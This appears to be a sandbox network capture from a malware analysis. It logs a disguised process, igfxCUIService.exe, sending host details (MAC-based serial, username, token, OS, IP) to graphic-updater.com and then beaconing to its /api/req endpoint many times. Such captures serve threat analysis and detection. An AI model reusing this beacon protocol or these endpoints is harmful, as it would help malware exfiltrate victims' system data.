                                        Date: Tue, 11 Jan 2022 16:09:18 GMT
                                        Server: Apache/2.4.41 (Ubuntu)
                                        Cache-Control: no-cache, private
                                        X-RateLimit-Limit: 60
                                        X-RateLimit-Remaining: 42
                                        Access-Control-Allow-Origin: *
                                        Content-Length: 11
                                        Connection: close
                                        Content-Type: application/json
                                        2022-01-11 16:09:18 UTC | 21 | IN | Data Raw: 7b 22 64 61 74 61 22 3a 5b 5d 7d
                                        Data Ascii: {"data":[]}


                                        Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                        22 | 192.168.2.4 | 49815 | 23.254.131.176 | 443 | C:\ProgramData\SystemData\igfxCUIService.exe
                                        Timestamp | kBytes transferred | Direction | Data
                                        2022-01-11 16:09:18 UTC | 21 | OUT | POST /api/attach HTTP/1.1
                                        Connection: Keep-Alive
                                        Content-Type: application/x-www-form-urlencoded
                                        User-Agent: WinHttpClient
                                        Content-Length: 136
                                        Host: graphic-updater.com
                                        2022-01-11 16:09:18 UTC | 21 | OUT | Data Raw: 73 65 72 69 61 6c 3d 45 43 2d 46 34 2d 42 42 2d 45 41 2d 31 35 2d 38 38 5f 5f 6a 6f 6e 65 73 26 6e 61 6d 65 3d 6a 6f 6e 65 73 26 75 73 65 72 5f 74 6f 6b 65 6e 3d 38 37 32 33 34 37 38 38 37 33 34 38 37 26 6f 73 3d 20 4d 69 63 72 6f 73 6f 66 74 20 57 69 6e 64 6f 77 73 20 31 30 20 50 72 6f 20 20 36 34 2d 62 69 74 20 31 30 2e 30 2e 31 37 31 33 34 26 61 6e 74 69 3d 26 69 70 3d 31 39 32 2e 31 36 38 2e 32 2e 34
                                        Data Ascii: serial=EC-F4-BB-EA-15-88__user&name=user&user_token=8723478873487&os= Microsoft Windows 10 Pro 64-bit 10.0.17134&anti=&ip=192.168.2.4
                                        2022-01-11 16:09:18 UTC | 21 | IN | HTTP/1.1 200 OK
                                        Date: Tue, 11 Jan 2022 16:09:18 GMT
                                        Server: Apache/2.4.41 (Ubuntu)
                                        Cache-Control: no-cache, private
                                        X-RateLimit-Limit: 60
                                        X-RateLimit-Remaining: 41
                                        Access-Control-Allow-Origin: *
                                        Content-Length: 48
                                        Connection: close
                                        Content-Type: application/json
                                        2022-01-11 16:09:18 UTC | 21 | IN | Data Raw: 7b 22 74 6f 6b 65 6e 22 3a 22 64 64 61 33 65 33 32 36 2d 34 36 32 64 2d 34 30 38 32 2d 61 36 62 64 2d 30 37 63 37 66 31 61 66 64 37 36 34 22 7d
                                        Data Ascii: {"token":"dda3e326-462d-4082-a6bd-07c7f1afd764"}


                                        Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                        23 | 192.168.2.4 | 49816 | 23.254.131.176 | 443 | C:\ProgramData\SystemData\igfxCUIService.exe
                                        Timestamp | kBytes transferred | Direction | Data
                                        2022-01-11 16:09:19 UTC | 21 | OUT | POST /api/req HTTP/1.1
                                        Connection: Keep-Alive
                                        Content-Type: application/x-www-form-urlencoded
                                        User-Agent: WinHttpClient
                                        Content-Length: 42
                                        Host: graphic-updater.com
                                        2022-01-11 16:09:19 UTC | 22 | OUT | Data Raw: 74 6f 6b 65 6e 3d 64 64 61 33 65 33 32 36 2d 34 36 32 64 2d 34 30 38 32 2d 61 36 62 64 2d 30 37 63 37 66 31 61 66 64 37 36 34
                                        Data Ascii: token=dda3e326-462d-4082-a6bd-07c7f1afd764
                                        2022-01-11 16:09:19 UTC | 22 | IN | HTTP/1.1 200 OK
                                        Date: Tue, 11 Jan 2022 16:09:19 GMT
                                        Server: Apache/2.4.41 (Ubuntu)
                                        Cache-Control: no-cache, private
                                        X-RateLimit-Limit: 60
                                        X-RateLimit-Remaining: 40
                                        Access-Control-Allow-Origin: *
                                        Content-Length: 11
                                        Connection: close
                                        Content-Type: application/json
                                        2022-01-11 16:09:19 UTC | 22 | IN | Data Raw: 7b 22 64 61 74 61 22 3a 5b 5d 7d
                                        Data Ascii: {"data":[]}


                                        Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                        24 | 192.168.2.4 | 49817 | 23.254.131.176 | 443 | C:\ProgramData\SystemData\igfxCUIService.exe
                                        Timestamp | kBytes transferred | Direction | Data
                                        2022-01-11 16:09:19 UTC | 22 | OUT | POST /api/req HTTP/1.1
                                        Connection: Keep-Alive
                                        Content-Type: application/x-www-form-urlencoded
                                        User-Agent: WinHttpClient
                                        Content-Length: 42
                                        Host: graphic-updater.com
                                        2022-01-11 16:09:19 UTC | 22 | OUT | Data Raw: 74 6f 6b 65 6e 3d 64 64 61 33 65 33 32 36 2d 34 36 32 64 2d 34 30 38 32 2d 61 36 62 64 2d 30 37 63 37 66 31 61 66 64 37 36 34
                                        Data Ascii: token=dda3e326-462d-4082-a6bd-07c7f1afd764
                                        2022-01-11 16:09:19 UTC | 22 | IN | HTTP/1.1 200 OK
                                        Date: Tue, 11 Jan 2022 16:09:19 GMT
                                        Server: Apache/2.4.41 (Ubuntu)
                                        Cache-Control: no-cache, private
                                        X-RateLimit-Limit: 60
                                        X-RateLimit-Remaining: 39
                                        Access-Control-Allow-Origin: *
                                        Content-Length: 11
                                        Connection: close
                                        Content-Type: application/json
                                        2022-01-11 16:09:19 UTC | 22 | IN | Data Raw: 7b 22 64 61 74 61 22 3a 5b 5d 7d
                                        Data Ascii: {"data":[]}


                                        Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                        25 | 192.168.2.4 | 49818 | 23.254.131.176 | 443 | C:\ProgramData\SystemData\igfxCUIService.exe
                                        Timestamp | kBytes transferred | Direction | Data
                                        2022-01-11 16:09:19 UTC | 22 | OUT | POST /api/req HTTP/1.1
                                        Connection: Keep-Alive
                                        Content-Type: application/x-www-form-urlencoded
                                        User-Agent: WinHttpClient
                                        Content-Length: 42
                                        Host: graphic-updater.com
                                        2022-01-11 16:09:19 UTC | 23 | OUT | Data Raw: 74 6f 6b 65 6e 3d 64 64 61 33 65 33 32 36 2d 34 36 32 64 2d 34 30 38 32 2d 61 36 62 64 2d 30 37 63 37 66 31 61 66 64 37 36 34
                                        Data Ascii: token=dda3e326-462d-4082-a6bd-07c7f1afd764
                                        2022-01-11 16:09:20 UTC | 23 | IN | HTTP/1.1 200 OK
                                        Date: Tue, 11 Jan 2022 16:09:20 GMT
                                        Server: Apache/2.4.41 (Ubuntu)
                                        Cache-Control: no-cache, private
                                        X-RateLimit-Limit: 60
                                        X-RateLimit-Remaining: 38
                                        Access-Control-Allow-Origin: *
                                        Content-Length: 11
                                        Connection: close
                                        Content-Type: application/json
                                        2022-01-11 16:09:20 UTC | 23 | IN | Data Raw: 7b 22 64 61 74 61 22 3a 5b 5d 7d
                                        Data Ascii: {"data":[]}


                                        Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                        26 | 192.168.2.4 | 49819 | 23.254.131.176 | 443 | C:\ProgramData\SystemData\igfxCUIService.exe
                                        Timestamp | kBytes transferred | Direction | Data
                                        2022-01-11 16:09:20 UTC | 23 | OUT | POST /api/req HTTP/1.1
                                        Connection: Keep-Alive
                                        Content-Type: application/x-www-form-urlencoded
                                        User-Agent: WinHttpClient
                                        Content-Length: 42
                                        Host: graphic-updater.com
                                        2022-01-11 16:09:20 UTC | 23 | OUT | Data Raw: 74 6f 6b 65 6e 3d 64 64 61 33 65 33 32 36 2d 34 36 32 64 2d 34 30 38 32 2d 61 36 62 64 2d 30 37 63 37 66 31 61 66 64 37 36 34
                                        Data Ascii: token=dda3e326-462d-4082-a6bd-07c7f1afd764
                                        2022-01-11 16:09:20 UTC | 23 | IN | HTTP/1.1 200 OK
                                        Date: Tue, 11 Jan 2022 16:09:20 GMT
                                        Server: Apache/2.4.41 (Ubuntu)
                                        Cache-Control: no-cache, private
                                        X-RateLimit-Limit: 60
                                        X-RateLimit-Remaining: 37
                                        Access-Control-Allow-Origin: *
                                        Content-Length: 11
                                        Connection: close
                                        Content-Type: application/json
                                        2022-01-11 16:09:20 UTC | 23 | IN | Data Raw: 7b 22 64 61 74 61 22 3a 5b 5d 7d
                                        Data Ascii: {"data":[]}


                                        Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                        27 | 192.168.2.4 | 49820 | 23.254.131.176 | 443 | C:\ProgramData\SystemData\igfxCUIService.exe
                                        Timestamp | kBytes transferred | Direction | Data
                                        2022-01-11 16:09:20 UTC | 23 | OUT | POST /api/req HTTP/1.1
                                        Connection: Keep-Alive
                                        Content-Type: application/x-www-form-urlencoded
                                        User-Agent: WinHttpClient
                                        Content-Length: 42
                                        Host: graphic-updater.com
                                        2022-01-11 16:09:20 UTC | 24 | OUT | Data Raw: 74 6f 6b 65 6e 3d 64 64 61 33 65 33 32 36 2d 34 36 32 64 2d 34 30 38 32 2d 61 36 62 64 2d 30 37 63 37 66 31 61 66 64 37 36 34
                                        Data Ascii: token=dda3e326-462d-4082-a6bd-07c7f1afd764
                                        2022-01-11 16:09:21 UTC | 24 | IN | HTTP/1.1 200 OK
                                        Date: Tue, 11 Jan 2022 16:09:20 GMT
                                        Server: Apache/2.4.41 (Ubuntu)
                                        Cache-Control: no-cache, private
                                        X-RateLimit-Limit: 60
                                        X-RateLimit-Remaining: 36
                                        Access-Control-Allow-Origin: *
                                        Content-Length: 11
                                        Connection: close
                                        Content-Type: application/json
                                        2022-01-11 16:09:21 UTC | 24 | IN | Data Raw: 7b 22 64 61 74 61 22 3a 5b 5d 7d
                                        Data Ascii: {"data":[]}


                                        Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                        28 | 192.168.2.4 | 49821 | 23.254.131.176 | 443 | C:\ProgramData\SystemData\igfxCUIService.exe
                                        Timestamp | kBytes transferred | Direction | Data
                                        2022-01-11 16:09:20 UTC | 24 | OUT | POST /api/req HTTP/1.1
                                        Connection: Keep-Alive
                                        Content-Type: application/x-www-form-urlencoded
                                        User-Agent: WinHttpClient
                                        Content-Length: 42
                                        Host: graphic-updater.com
                                        2022-01-11 16:09:20 UTC | 24 | OUT | Data Raw: 74 6f 6b 65 6e 3d 64 64 61 33 65 33 32 36 2d 34 36 32 64 2d 34 30 38 32 2d 61 36 62 64 2d 30 37 63 37 66 31 61 66 64 37 36 34
                                        Data Ascii: token=dda3e326-462d-4082-a6bd-07c7f1afd764
                                        2022-01-11 16:09:21 UTC | 24 | IN | HTTP/1.1 200 OK
                                        Date: Tue, 11 Jan 2022 16:09:21 GMT
                                        Server: Apache/2.4.41 (Ubuntu)
                                        Cache-Control: no-cache, private
                                        X-RateLimit-Limit: 60
                                        X-RateLimit-Remaining: 35
                                        Access-Control-Allow-Origin: *
                                        Content-Length: 11
                                        Connection: close
                                        Content-Type: application/json
                                        2022-01-11 16:09:21 UTC | 24 | IN | Data Raw: 7b 22 64 61 74 61 22 3a 5b 5d 7d
                                        Data Ascii: {"data":[]}


                                        Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                        29 | 192.168.2.4 | 49822 | 23.254.131.176 | 443 | C:\ProgramData\SystemData\igfxCUIService.exe
                                        Timestamp | kBytes transferred | Direction | Data
                                        2022-01-11 16:09:21 UTC | 24 | OUT | POST /api/req HTTP/1.1
                                        Connection: Keep-Alive
                                        Content-Type: application/x-www-form-urlencoded
                                        User-Agent: WinHttpClient
                                        Content-Length: 42
                                        Host: graphic-updater.com
                                        2022-01-11 16:09:21 UTC | 25 | OUT | Data Raw: 74 6f 6b 65 6e 3d 64 64 61 33 65 33 32 36 2d 34 36 32 64 2d 34 30 38 32 2d 61 36 62 64 2d 30 37 63 37 66 31 61 66 64 37 36 34
                                        Data Ascii: token=dda3e326-462d-4082-a6bd-07c7f1afd764
                                        2022-01-11 16:09:21 UTC | 25 | IN | HTTP/1.1 200 OK
                                        Date: Tue, 11 Jan 2022 16:09:21 GMT
                                        Server: Apache/2.4.41 (Ubuntu)
                                        Cache-Control: no-cache, private
                                        X-RateLimit-Limit: 60
                                        X-RateLimit-Remaining: 34
                                        Access-Control-Allow-Origin: *
                                        Content-Length: 11
                                        Connection: close
                                        Content-Type: application/json
                                        2022-01-11 16:09:21 UTC | 25 | IN | Data Raw: 7b 22 64 61 74 61 22 3a 5b 5d 7d
                                        Data Ascii: {"data":[]}


                                        Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                        3 | 192.168.2.4 | 49796 | 23.254.131.176 | 443 | C:\ProgramData\SystemData\igfxCUIService.exe
                                        Timestamp | kBytes transferred | Direction | Data
                                        2022-01-11 16:09:04 UTC | 6 | OUT | POST /api/req HTTP/1.1
                                        Connection: Keep-Alive
                                        Content-Type: application/x-www-form-urlencoded
                                        User-Agent: WinHttpClient
                                        Content-Length: 42
                                        Host: graphic-updater.com
                                        2022-01-11 16:09:04 UTC | 7 | OUT | Data Raw: 74 6f 6b 65 6e 3d 64 64 61 33 65 33 32 36 2d 34 36 32 64 2d 34 30 38 32 2d 61 36 62 64 2d 30 37 63 37 66 31 61 66 64 37 36 34
                                        Data Ascii: token=dda3e326-462d-4082-a6bd-07c7f1afd764
                                        2022-01-11 16:09:05 UTC | 7 | IN | HTTP/1.1 200 OK
                                        Date: Tue, 11 Jan 2022 16:09:04 GMT
                                        Server: Apache/2.4.41 (Ubuntu)
                                        Cache-Control: no-cache, private
                                        X-RateLimit-Limit: 60
                                        X-RateLimit-Remaining: 58
                                        Access-Control-Allow-Origin: *
                                        Content-Length: 11
                                        Connection: close
                                        Content-Type: application/json
                                        2022-01-11 16:09:05 UTC | 7 | IN | Data Raw: 7b 22 64 61 74 61 22 3a 5b 5d 7d
                                        Data Ascii: {"data":[]}


                                        Session ID: 30 | Source: 192.168.2.4:49823 | Destination: 23.254.131.176:443 | Process: C:\ProgramData\SystemData\igfxCUIService.exe
                                        Timestamp | kBytes transferred | Direction | Data
                                        2022-01-11 16:09:21 UTC | 25 | OUT | POST /api/req HTTP/1.1
                                        Connection: Keep-Alive
                                        Content-Type: application/x-www-form-urlencoded
                                        User-Agent: WinHttpClient
                                        Content-Length: 42
                                        Host: graphic-updater.com
                                        2022-01-11 16:09:21 UTC | 25 | OUT | Data Raw: 74 6f 6b 65 6e 3d 64 64 61 33 65 33 32 36 2d 34 36 32 64 2d 34 30 38 32 2d 61 36 62 64 2d 30 37 63 37 66 31 61 66 64 37 36 34
                                        Data Ascii: token=dda3e326-462d-4082-a6bd-07c7f1afd764
                                        2022-01-11 16:09:22 UTC | 25 | IN | HTTP/1.1 200 OK
                                        Date: Tue, 11 Jan 2022 16:09:22 GMT
                                        Server: Apache/2.4.41 (Ubuntu)
                                        Cache-Control: no-cache, private
                                        X-RateLimit-Limit: 60
                                        X-RateLimit-Remaining: 33
                                        Access-Control-Allow-Origin: *
                                        Content-Length: 11
                                        Connection: close
                                        Content-Type: application/json
                                        2022-01-11 16:09:22 UTC | 25 | IN | Data Raw: 7b 22 64 61 74 61 22 3a 5b 5d 7d
                                        Data Ascii: {"data":[]}


                                        Session ID: 31 | Source: 192.168.2.4:49824 | Destination: 23.254.131.176:443 | Process: C:\ProgramData\SystemData\igfxCUIService.exe
                                        Timestamp | kBytes transferred | Direction | Data
                                        2022-01-11 16:09:22 UTC | 25 | OUT | POST /api/req HTTP/1.1
                                        Connection: Keep-Alive
                                        Content-Type: application/x-www-form-urlencoded
                                        User-Agent: WinHttpClient
                                        Content-Length: 42
                                        Host: graphic-updater.com
                                        2022-01-11 16:09:22 UTC | 26 | OUT | Data Raw: 74 6f 6b 65 6e 3d 64 64 61 33 65 33 32 36 2d 34 36 32 64 2d 34 30 38 32 2d 61 36 62 64 2d 30 37 63 37 66 31 61 66 64 37 36 34
                                        Data Ascii: token=dda3e326-462d-4082-a6bd-07c7f1afd764
                                        2022-01-11 16:09:22 UTC | 26 | IN | HTTP/1.1 200 OK
                                        Date: Tue, 11 Jan 2022 16:09:22 GMT
                                        Server: Apache/2.4.41 (Ubuntu)
                                        Cache-Control: no-cache, private
                                        X-RateLimit-Limit: 60
                                        X-RateLimit-Remaining: 32
                                        Access-Control-Allow-Origin: *
                                        Content-Length: 11
                                        Connection: close
                                        Content-Type: application/json
                                        2022-01-11 16:09:22 UTC | 26 | IN | Data Raw: 7b 22 64 61 74 61 22 3a 5b 5d 7d
                                        Data Ascii: {"data":[]}


                                        Session ID: 32 | Source: 192.168.2.4:49825 | Destination: 23.254.131.176:443 | Process: C:\ProgramData\SystemData\igfxCUIService.exe
                                        Timestamp | kBytes transferred | Direction | Data
                                        2022-01-11 16:09:23 UTC | 26 | OUT | POST /api/req HTTP/1.1
                                        Connection: Keep-Alive
                                        Content-Type: application/x-www-form-urlencoded
                                        User-Agent: WinHttpClient
                                        Content-Length: 42
                                        Host: graphic-updater.com
                                        2022-01-11 16:09:23 UTC | 26 | OUT | Data Raw: 74 6f 6b 65 6e 3d 64 64 61 33 65 33 32 36 2d 34 36 32 64 2d 34 30 38 32 2d 61 36 62 64 2d 30 37 63 37 66 31 61 66 64 37 36 34
                                        Data Ascii: token=dda3e326-462d-4082-a6bd-07c7f1afd764
                                        2022-01-11 16:09:23 UTC | 26 | IN | HTTP/1.1 200 OK
                                        Date: Tue, 11 Jan 2022 16:09:23 GMT
                                        Server: Apache/2.4.41 (Ubuntu)
                                        Cache-Control: no-cache, private
                                        X-RateLimit-Limit: 60
                                        X-RateLimit-Remaining: 31
                                        Access-Control-Allow-Origin: *
                                        Content-Length: 11
                                        Connection: close
                                        Content-Type: application/json
                                        2022-01-11 16:09:23 UTC | 27 | IN | Data Raw: 7b 22 64 61 74 61 22 3a 5b 5d 7d
                                        Data Ascii: {"data":[]}


                                        Session ID: 33 | Source: 192.168.2.4:49826 | Destination: 23.254.131.176:443 | Process: C:\ProgramData\SystemData\igfxCUIService.exe
                                        Timestamp | kBytes transferred | Direction | Data
                                        2022-01-11 16:09:23 UTC | 26 | OUT | POST /api/req HTTP/1.1
                                        Connection: Keep-Alive
                                        Content-Type: application/x-www-form-urlencoded
                                        User-Agent: WinHttpClient
                                        Content-Length: 42
                                        Host: graphic-updater.com
                                        2022-01-11 16:09:23 UTC | 26 | OUT | Data Raw: 74 6f 6b 65 6e 3d 64 64 61 33 65 33 32 36 2d 34 36 32 64 2d 34 30 38 32 2d 61 36 62 64 2d 30 37 63 37 66 31 61 66 64 37 36 34
                                        Data Ascii: token=dda3e326-462d-4082-a6bd-07c7f1afd764
                                        2022-01-11 16:09:23 UTC | 27 | IN | HTTP/1.1 200 OK
                                        Date: Tue, 11 Jan 2022 16:09:23 GMT
                                        Server: Apache/2.4.41 (Ubuntu)
                                        Cache-Control: no-cache, private
                                        X-RateLimit-Limit: 60
                                        X-RateLimit-Remaining: 30
                                        Access-Control-Allow-Origin: *
                                        Content-Length: 11
                                        Connection: close
                                        Content-Type: application/json
                                        2022-01-11 16:09:23 UTC | 27 | IN | Data Raw: 7b 22 64 61 74 61 22 3a 5b 5d 7d
                                        Data Ascii: {"data":[]}


                                        Session ID: 34 | Source: 192.168.2.4:49827 | Destination: 23.254.131.176:443 | Process: C:\ProgramData\SystemData\igfxCUIService.exe
                                        Timestamp | kBytes transferred | Direction | Data
                                        2022-01-11 16:09:23 UTC | 27 | OUT | POST /api/req HTTP/1.1
                                        Connection: Keep-Alive
                                        Content-Type: application/x-www-form-urlencoded
                                        User-Agent: WinHttpClient
                                        Content-Length: 42
                                        Host: graphic-updater.com
                                        2022-01-11 16:09:23 UTC | 27 | OUT | Data Raw: 74 6f 6b 65 6e 3d 64 64 61 33 65 33 32 36 2d 34 36 32 64 2d 34 30 38 32 2d 61 36 62 64 2d 30 37 63 37 66 31 61 66 64 37 36 34
                                        Data Ascii: token=dda3e326-462d-4082-a6bd-07c7f1afd764
                                        2022-01-11 16:09:24 UTC | 27 | IN | HTTP/1.1 200 OK
                                        Date: Tue, 11 Jan 2022 16:09:23 GMT
                                        Server: Apache/2.4.41 (Ubuntu)
                                        Cache-Control: no-cache, private
                                        X-RateLimit-Limit: 60
                                        X-RateLimit-Remaining: 29
                                        Access-Control-Allow-Origin: *
                                        Content-Length: 11
                                        Connection: close
                                        Content-Type: application/json
                                        2022-01-11 16:09:24 UTC | 28 | IN | Data Raw: 7b 22 64 61 74 61 22 3a 5b 5d 7d
                                        Data Ascii: {"data":[]}


                                        Session ID: 35 | Source: 192.168.2.4:49828 | Destination: 23.254.131.176:443 | Process: C:\ProgramData\SystemData\igfxCUIService.exe
                                        Timestamp | kBytes transferred | Direction | Data
                                        2022-01-11 16:09:24 UTC | 27 | OUT | POST /api/req HTTP/1.1
                                        Connection: Keep-Alive
                                        Content-Type: application/x-www-form-urlencoded
                                        User-Agent: WinHttpClient
                                        Content-Length: 42
                                        Host: graphic-updater.com
                                        2022-01-11 16:09:24 UTC | 27 | OUT | Data Raw: 74 6f 6b 65 6e 3d 64 64 61 33 65 33 32 36 2d 34 36 32 64 2d 34 30 38 32 2d 61 36 62 64 2d 30 37 63 37 66 31 61 66 64 37 36 34
                                        Data Ascii: token=dda3e326-462d-4082-a6bd-07c7f1afd764
                                        2022-01-11 16:09:24 UTC | 28 | IN | HTTP/1.1 200 OK
                                        Date: Tue, 11 Jan 2022 16:09:24 GMT
                                        Server: Apache/2.4.41 (Ubuntu)
                                        Cache-Control: no-cache, private
                                        X-RateLimit-Limit: 60
                                        X-RateLimit-Remaining: 28
                                        Access-Control-Allow-Origin: *
                                        Content-Length: 11
                                        Connection: close
                                        Content-Type: application/json
                                        2022-01-11 16:09:24 UTC | 28 | IN | Data Raw: 7b 22 64 61 74 61 22 3a 5b 5d 7d
                                        Data Ascii: {"data":[]}


                                        Session ID: 36 | Source: 192.168.2.4:49829 | Destination: 23.254.131.176:443 | Process: C:\ProgramData\SystemData\igfxCUIService.exe
                                        Timestamp | kBytes transferred | Direction | Data
                                        2022-01-11 16:09:24 UTC | 28 | OUT | POST /api/req HTTP/1.1
                                        Connection: Keep-Alive
                                        Content-Type: application/x-www-form-urlencoded
                                        User-Agent: WinHttpClient
                                        Content-Length: 42
                                        Host: graphic-updater.com
                                        2022-01-11 16:09:24 UTC | 28 | OUT | Data Raw: 74 6f 6b 65 6e 3d 64 64 61 33 65 33 32 36 2d 34 36 32 64 2d 34 30 38 32 2d 61 36 62 64 2d 30 37 63 37 66 31 61 66 64 37 36 34
                                        Data Ascii: token=dda3e326-462d-4082-a6bd-07c7f1afd764
                                        2022-01-11 16:09:24 UTC | 28 | IN | HTTP/1.1 200 OK
                                        Date: Tue, 11 Jan 2022 16:09:24 GMT
                                        Server: Apache/2.4.41 (Ubuntu)
                                        Cache-Control: no-cache, private
                                        X-RateLimit-Limit: 60
                                        X-RateLimit-Remaining: 27
                                        Access-Control-Allow-Origin: *
                                        Content-Length: 11
                                        Connection: close
                                        Content-Type: application/json
                                        2022-01-11 16:09:24 UTC | 29 | IN | Data Raw: 7b 22 64 61 74 61 22 3a 5b 5d 7d
                                        Data Ascii: {"data":[]}


                                        Session ID: 37 | Source: 192.168.2.4:49830 | Destination: 23.254.131.176:443 | Process: C:\ProgramData\SystemData\igfxCUIService.exe
                                        Timestamp | kBytes transferred | Direction | Data
                                        2022-01-11 16:09:24 UTC | 28 | OUT | POST /api/req HTTP/1.1
                                        Connection: Keep-Alive
                                        Content-Type: application/x-www-form-urlencoded
                                        User-Agent: WinHttpClient
                                        Content-Length: 42
                                        Host: graphic-updater.com
                                        2022-01-11 16:09:24 UTC | 28 | OUT | Data Raw: 74 6f 6b 65 6e 3d 64 64 61 33 65 33 32 36 2d 34 36 32 64 2d 34 30 38 32 2d 61 36 62 64 2d 30 37 63 37 66 31 61 66 64 37 36 34
                                        Data Ascii: token=dda3e326-462d-4082-a6bd-07c7f1afd764
                                        2022-01-11 16:09:25 UTC | 29 | IN | HTTP/1.1 200 OK
                                        Date: Tue, 11 Jan 2022 16:09:25 GMT
                                        Server: Apache/2.4.41 (Ubuntu)
                                        Cache-Control: no-cache, private
                                        X-RateLimit-Limit: 60
                                        X-RateLimit-Remaining: 26
                                        Access-Control-Allow-Origin: *
                                        Content-Length: 11
                                        Connection: close
                                        Content-Type: application/json
                                        2022-01-11 16:09:25 UTC | 29 | IN | Data Raw: 7b 22 64 61 74 61 22 3a 5b 5d 7d
                                        Data Ascii: {"data":[]}


                                        Session ID: 38 | Source: 192.168.2.4:49831 | Destination: 23.254.131.176:443 | Process: C:\ProgramData\SystemData\igfxCUIService.exe
                                        Timestamp | kBytes transferred | Direction | Data
                                        2022-01-11 16:09:25 UTC | 29 | OUT | POST /api/req HTTP/1.1
                                        Connection: Keep-Alive
                                        Content-Type: application/x-www-form-urlencoded
                                        User-Agent: WinHttpClient
                                        Content-Length: 42
                                        Host: graphic-updater.com
                                        2022-01-11 16:09:25 UTC | 29 | OUT | Data Raw: 74 6f 6b 65 6e 3d 64 64 61 33 65 33 32 36 2d 34 36 32 64 2d 34 30 38 32 2d 61 36 62 64 2d 30 37 63 37 66 31 61 66 64 37 36 34
                                        Data Ascii: token=dda3e326-462d-4082-a6bd-07c7f1afd764
                                        2022-01-11 16:09:25 UTC | 29 | IN | HTTP/1.1 200 OK
                                        Date: Tue, 11 Jan 2022 16:09:25 GMT
                                        Server: Apache/2.4.41 (Ubuntu)
                                        Cache-Control: no-cache, private
                                        X-RateLimit-Limit: 60
                                        X-RateLimit-Remaining: 25
                                        Access-Control-Allow-Origin: *
                                        Content-Length: 11
                                        Connection: close
                                        Content-Type: application/json
                                        2022-01-11 16:09:25 UTC | 30 | IN | Data Raw: 7b 22 64 61 74 61 22 3a 5b 5d 7d
                                        Data Ascii: {"data":[]}


                                        Session ID: 39 | Source: 192.168.2.4:49832 | Destination: 23.254.131.176:443 | Process: C:\ProgramData\SystemData\igfxCUIService.exe
                                        Timestamp | kBytes transferred | Direction | Data
                                        2022-01-11 16:09:25 UTC | 29 | OUT | POST /api/req HTTP/1.1
                                        Connection: Keep-Alive
                                        Content-Type: application/x-www-form-urlencoded
                                        User-Agent: WinHttpClient
                                        Content-Length: 42
                                        Host: graphic-updater.com
                                        2022-01-11 16:09:25 UTC | 29 | OUT | Data Raw: 74 6f 6b 65 6e 3d 64 64 61 33 65 33 32 36 2d 34 36 32 64 2d 34 30 38 32 2d 61 36 62 64 2d 30 37 63 37 66 31 61 66 64 37 36 34
                                        Data Ascii: token=dda3e326-462d-4082-a6bd-07c7f1afd764
                                        2022-01-11 16:09:26 UTC | 30 | IN | HTTP/1.1 200 OK
                                        Date: Tue, 11 Jan 2022 16:09:25 GMT
                                        Server: Apache/2.4.41 (Ubuntu)
                                        Cache-Control: no-cache, private
                                        X-RateLimit-Limit: 60
                                        X-RateLimit-Remaining: 24
                                        Access-Control-Allow-Origin: *
                                        Content-Length: 11
                                        Connection: close
                                        Content-Type: application/json
                                        2022-01-11 16:09:26 UTC | 30 | IN | Data Raw: 7b 22 64 61 74 61 22 3a 5b 5d 7d
                                        Data Ascii: {"data":[]}


                                        Session ID: 4 | Source: 192.168.2.4:49797 | Destination: 23.254.131.176:443 | Process: C:\ProgramData\SystemData\igfxCUIService.exe
                                        Timestamp | kBytes transferred | Direction | Data
                                        2022-01-11 16:09:05 UTC | 7 | OUT | POST /api/req HTTP/1.1
                                        Connection: Keep-Alive
                                        Content-Type: application/x-www-form-urlencoded
                                        User-Agent: WinHttpClient
                                        Content-Length: 42
                                        Host: graphic-updater.com
                                        2022-01-11 16:09:05 UTC | 7 | OUT | Data Raw: 74 6f 6b 65 6e 3d 64 64 61 33 65 33 32 36 2d 34 36 32 64 2d 34 30 38 32 2d 61 36 62 64 2d 30 37 63 37 66 31 61 66 64 37 36 34
                                        Data Ascii: token=dda3e326-462d-4082-a6bd-07c7f1afd764
                                        2022-01-11 16:09:05 UTC | 7 | IN | HTTP/1.1 200 OK
                                        Date: Tue, 11 Jan 2022 16:09:05 GMT
                                        Server: Apache/2.4.41 (Ubuntu)
                                        Cache-Control: no-cache, private
                                        X-RateLimit-Limit: 60
                                        X-RateLimit-Remaining: 57
                                        Access-Control-Allow-Origin: *
                                        Content-Length: 11
                                        Connection: close
                                        Content-Type: application/json
                                        2022-01-11 16:09:05 UTC | 7 | IN | Data Raw: 7b 22 64 61 74 61 22 3a 5b 5d 7d
                                        Data Ascii: {"data":[]}


                                        Session ID: 40 | Source: 192.168.2.4:49834 | Destination: 23.254.131.176:443 | Process: C:\ProgramData\SystemData\igfxCUIService.exe
                                        Timestamp | kBytes transferred | Direction | Data
                                        2022-01-11 16:09:26 UTC | 30 | OUT | POST /api/req HTTP/1.1
                                        Connection: Keep-Alive
                                        Content-Type: application/x-www-form-urlencoded
                                        User-Agent: WinHttpClient
                                        Content-Length: 42
                                        Host: graphic-updater.com
                                        2022-01-11 16:09:26 UTC | 30 | OUT | Data Raw: 74 6f 6b 65 6e 3d 64 64 61 33 65 33 32 36 2d 34 36 32 64 2d 34 30 38 32 2d 61 36 62 64 2d 30 37 63 37 66 31 61 66 64 37 36 34
                                        Data Ascii: token=dda3e326-462d-4082-a6bd-07c7f1afd764
                                        2022-01-11 16:09:26 UTC | 31 | IN | HTTP/1.1 200 OK
                                        Date: Tue, 11 Jan 2022 16:09:26 GMT
                                        Server: Apache/2.4.41 (Ubuntu)
                                        Cache-Control: no-cache, private
                                        X-RateLimit-Limit: 60
                                        X-RateLimit-Remaining: 22
                                        Access-Control-Allow-Origin: *
                                        Content-Length: 11
                                        Connection: close
                                        Content-Type: application/json
                                        2022-01-11 16:09:26 UTC | 31 | IN | Data Raw: 7b 22 64 61 74 61 22 3a 5b 5d 7d
                                        Data Ascii: {"data":[]}


                                        Session ID: 41 | Source: 192.168.2.4:49835 | Destination: 23.254.131.176:443 | Process: C:\ProgramData\SystemData\igfxCUIService.exe
                                        Timestamp | kBytes transferred | Direction | Data
                                        2022-01-11 16:09:26 UTC | 30 | OUT | POST /api/req HTTP/1.1
                                        Connection: Keep-Alive
